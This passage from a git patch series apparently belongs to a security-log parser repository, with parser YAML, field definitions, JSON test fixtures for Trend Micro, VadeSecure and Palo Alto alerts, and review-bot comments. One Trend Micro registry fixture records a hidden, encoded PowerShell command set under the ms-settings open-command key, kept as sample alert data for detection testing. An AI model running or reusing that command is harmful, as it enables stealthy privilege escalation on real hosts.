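Review bot: `process.pid` is filled from the `objectPid` indicator while `process.command_line`, `process.executable` and `process.hash.*` come from the `process*` indicators; in the Vision One alert shape used by the new fixture, `object*` fields describe the target/child (`objectCmd` is `Advanced_IP_Scanner…exe`) and `process*` the acting process (`processCmd` is `Explorer.EXE`), so the PID placed here probably belongs to a different process than the command line and hash beside it. If the API exposes a `processPid` indicator, source `process.pid` from it; otherwise make the mismatch visible with `# objectPid is the target process's PID, not the acting process's — TODO confirm against the Vision One indicator schema`. This stage is moved rather than introduced by the hunk, but the regrouping is the natural place to settle it.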
@@ -57,22 +62,21 @@ stages: {%- endfor -%} {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} - # @todo should be along with registry.data.type to REG_SZ registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + - set: + registry.data.type: "REG_SZ" + filter: "{{final.registry.data.strings != null }}" + + - set: file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" - process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" - process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" - process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" - process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" - process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" - user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + - set: trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" 
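Review bot: `registry.data.type: "REG_SZ"` is asserted for every event carrying a `registry_value_data` indicator, but nothing in that indicator tells the parser the value's type — DWORD, binary and multi-string values will be tagged REG_SZ too, which misleads rules that filter on `registry.data.type` (the ECS field is meant to hold the real registry type). Either drop the constant or keep the removed `# @todo` intent visible with a comment such as `# Vision One does not expose the value type; REG_SZ is assumed — confirm`, so the assumption is not mistaken for parsed data. Separately, `filter: "{{final.registry.data.strings != null }}"` depends on `null` being defined by the template engine (Jinja's literal is `none`); if it resolves to an undefined name the comparison works only by accident, and `{{ final.registry.data.strings is defined }}` states the intent explicitly.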
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index f9873edf1..3c32834ae 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -41,7 +41,8 @@ }, "registry": { "data": { - "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x" + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "type": "REG_SZ" }, "hive": "hkcr", "key": "ms-settings\\shell\\open\\command", From bc86ba96e28498fa916cca216790f5b8094d6d16 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 15:51:21 +0200 Subject: [PATCH 45/84] Add test --- .../tests/test_internal_network_scanner.json | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json new file mode 100644 index 000000000..e6bcf0088 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json 
@@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", 
\"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], 
\"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", 
\"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": 
\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "john\\doe", + "name": "john\\doe" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": 
"New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "name": "doe" + } + } +} \ No newline at end of file From f2de94f0d1331ad57d49d1dcd514a59ee4fce317 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Wed, 20 Nov 2024 16:13:59 +0100 Subject: [PATCH 46/84] Update VadeSecure/vade_secure_m365/_meta/fields.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- VadeSecure/vade_secure_m365/_meta/fields.yml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index a3f60b15c..3dae6aab9 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,10 +58,20 @@ vadesecure.attachments: short: vadesecure.to_header type: array -vadesecure.auth_results_details: - description: Details of security protocols, mostly SPF, DKIM and DMARC. - name: vadesecure.auth_results_details - type: object +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + +vadesecure.auth_results_details.dkim: + description: The result of the DomainKeys Identified Mail (DKIM) + name: vadesecure.auth_results_details.dkim + type: keyword + +vadesecure.auth_results_details.dmarc: + description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC) + name: vadesecure.auth_results_details.dmarc + type: keyword vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. From 89031da02131389356f2da10693a5c1a31cbdac1 Mon Sep 17 00:00:00 2001 
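Review bot: The new `vadesecure.auth_results_details.dmarc` entry misspells the protocol name: `description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC)` should read `description: The result of the Domain-based Message Authentication, Reporting and Conformance (DMARC)`, which also matches the "The result of …" phrasing of the sibling SPF and DKIM entries. The same misspelled text is carried, re-wrapped over two lines, into the following commit (patch 47), so it needs fixing there as well. Replacing the single `object` field with three `keyword` leaves is only safe if the parser already emits exactly these three sub-keys; the diffstat touches fields.yml alone, so that is worth confirming against the intake's parser and test fixtures.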
From: LenaigKaliou Date: Wed, 20 Nov 2024 16:17:44 +0100 Subject: [PATCH 47/84] fix on linting --- VadeSecure/vade_secure_m365/_meta/fields.yml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 3dae6aab9..45923af39 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,21 +58,22 @@ vadesecure.attachments: short: vadesecure.to_header type: array -vadesecure.auth_results_details.spf: - description: The result of the Sender Policy Framework (SPF) - name: vadesecure.auth_results_details.spf - type: keyword - vadesecure.auth_results_details.dkim: description: The result of the DomainKeys Identified Mail (DKIM) name: vadesecure.auth_results_details.dkim type: keyword vadesecure.auth_results_details.dmarc: - description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC) + description: Result of the Domand-based Message Authentication Reporting and Conformance + (DMARC) name: vadesecure.auth_results_details.dmarc type: keyword +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions From ddb81e469ab08e04985947091be03113e7236a49 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:08:00 +0100 Subject: [PATCH 48/84] chore(PaloAlto): name some columns --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 2f8b22f2a..c81ad890e 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID From 03c2c78afb7a413856adddbbe760f167de860cd8 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:08:44 +0100 Subject: [PATCH 49/84] fix(PaloAlto): fix the definition of the user properties --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 4 ++-- .../paloalto-ngfw/tests/network_threat_alert_2.json | 6 +++--- .../paloalto-ngfw/tests/test_file_alert_json.json | 6 +++--- Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json | 6 +++--- 4 files changed, 11 insertions(+), 11 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index c81ad890e..b7ec21cac 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -810,8 +810,8 @@ stages: user.name: '{{final.user.name.split("\\") | last}}' filter: '{{final.user.name != null and "\\" in final.user.name}}' - set: - user.domain: '{{final.user.email.split("@") | first}}' - user.name: '{{final.user.email.split("@") | last}}' + user.domain: '{{final.user.email.split("@") | last}}' + user.name: '{{final.user.email.split("@") | first}}' filter: '{{final.user.email != null and "@" in final.user.email}}' - set: source.user.domain: '{{final.source.user.name.split("\\") | first}}' diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json index e8c257c69..f1e6cf2ad 100644 
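Review bot: The corrected email split is applied to `final.user.email` only; the `source.user` block that starts on the hunk's last context line (`source.user.domain: '{{final.source.user.name.split("\\") | first}}'`) still handles only the `DOMAIN\user` form, and since the stage continues outside the hunk I cannot see whether an equivalent `@` split exists for source.user. The hipmatch fixture added in patch 50 suggests it does not: it expects `source.user.name` to stay `jdoe@example.org` while `user.name`/`user.domain` become `jdoe`/`example.org`. If that asymmetry is not intended, a matching `set` guarded the same way as the `user.email` one, as below, would align the two fields; if it is intended, a one-line comment above the `source.user` block saying so would stop the next reader from "fixing" it.
```yaml
      - set:
          source.user.domain: '{{final.source.user.name.split("@") | last}}'
          source.user.name: '{{final.source.user.name.split("@") | first}}'
        filter: '{{final.source.user.name != null and "@" in final.source.user.name}}'
```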
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json @@ -84,7 +84,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "jdoe", "jdoe@example.org" ] }, @@ -117,9 +117,9 @@ "top_level_domain": "com" }, "user": { - "domain": "jdoe", + "domain": "example.org", "email": "jdoe@example.org", - "name": "example.org" + "name": "jdoe" }, "user_agent": { "name": "Microsoft NCSI" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index 3142ed671..e48b985ca 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -76,7 +76,7 @@ "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -97,9 +97,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json index edd76521b..4962d00cc 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json @@ -82,7 +82,7 @@ "8.7.6.5" ], "user": [ - "example.org", + "john.doe", "john.doe@example.org" ] }, @@ -103,9 +103,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.org", "email": "john.doe@example.org", - "name": "example.org" + "name": "john.doe" } } } \ No newline at end of file From 5763f40af5d8945417a9c7383753d6b97a2ab79a Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:09:32 +0100 Subject: [PATCH 50/84] test(PaloAlto): add test for hipmatch event in json representation --- .../tests/test_hipmatch_json.json | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json new file mode 100644 index 000000000..952e819e2 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json 
@@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe", + "jdoe@example.org" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "example.org", + "email": "jdoe@example.org", + "name": "jdoe" + } + } +} From 3aa5e742b94a0c9afa7f7572496254a95354dffd Mon Sep 17 00:00:00 2001 
